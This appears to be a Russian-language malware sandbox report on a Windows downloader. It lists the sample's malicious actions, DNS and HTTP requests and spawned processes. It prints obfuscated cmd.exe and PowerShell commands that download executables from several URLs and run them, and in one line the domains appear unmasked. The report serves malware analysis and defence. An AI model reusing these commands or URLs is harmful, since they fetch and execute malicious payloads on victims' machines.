Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /V:/C"set D5=;'AJA'=YGu$}}{hctac}};kaerb;'iQM'=lbj$;XMC$ metI-ekovnI{ )00008 eg- htgnel.)XMC$ metI-teG(( fI;'utr'=qYO$;)XMC$ ,vYq$(eliFdaolnwoD.ihP${yrt{)sQD$ ni vYq$(hcaerof;'exe.'+wSw$+'\'+pm...
Сетевая активность
Подключается к
- 'ma####kefield.com':80
- 'ma###eboyz.com':80
- 'ma###eboyz.com':443
- 'mi####lmillman.com':80
- 'mc####ypants.com':80
- 'ma#####mindsstudio.com':80
- 'ma#####mindsstudio.com':443
TCP
Запросы HTTP GET
- http://ma####kefield.com/BWQeMskFp
- http://ma###eboyz.com/GTZeEsRqi
- http://mi####lmillman.com/rVhfp9El
- http://mc####ypants.com/gqO25LS89k
- http://ma#####mindsstudio.com/OSx1mXXF
Другие
- 'ma###eboyz.com':443
- 'ma#####mindsstudio.com':443
UDP
- DNS ASK ma####kefield.com
- DNS ASK ma###eboyz.com
- DNS ASK mi####lmillman.com
- DNS ASK mc####ypants.com
- DNS ASK ma#####mindsstudio.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V:/C"set D5=;'AJA'=YGu$}}{hctac}};kaerb;'iQM'=lbj$;XMC$ metI-ekovnI{ )00008 eg- htgnel.)XMC$ metI-teG(( fI;'utr'=qYO$;)XMC$ ,vYq$(eliFdaolnwoD.ihP${yrt{)sQD$ ni vYq$(hcaerof;'exe.'+wSw$+'\'+pm...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /S /D /c" echo powershell $wiw='kVH';$Phi=new-object Net.WebClient;$DQs='http://ma####kefield.com/BWQeMskFp@http://marineboyz.com/GTZeEsRqi@http://michaelmillman.com/rVhfp9El@http://mcfunkypant...
- '<SYSTEM32>\cmd.exe' /S /D /c" FOR /F "tokens=12 delims=\n.D5" %5 IN ('ftype^|findstr Cons') DO %5 -"
- '<SYSTEM32>\cmd.exe' /c ftype|findstr Cons
- '<SYSTEM32>\cmd.exe' /S /D /c" ftype"
- '<SYSTEM32>\findstr.exe' Cons
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' =kVH
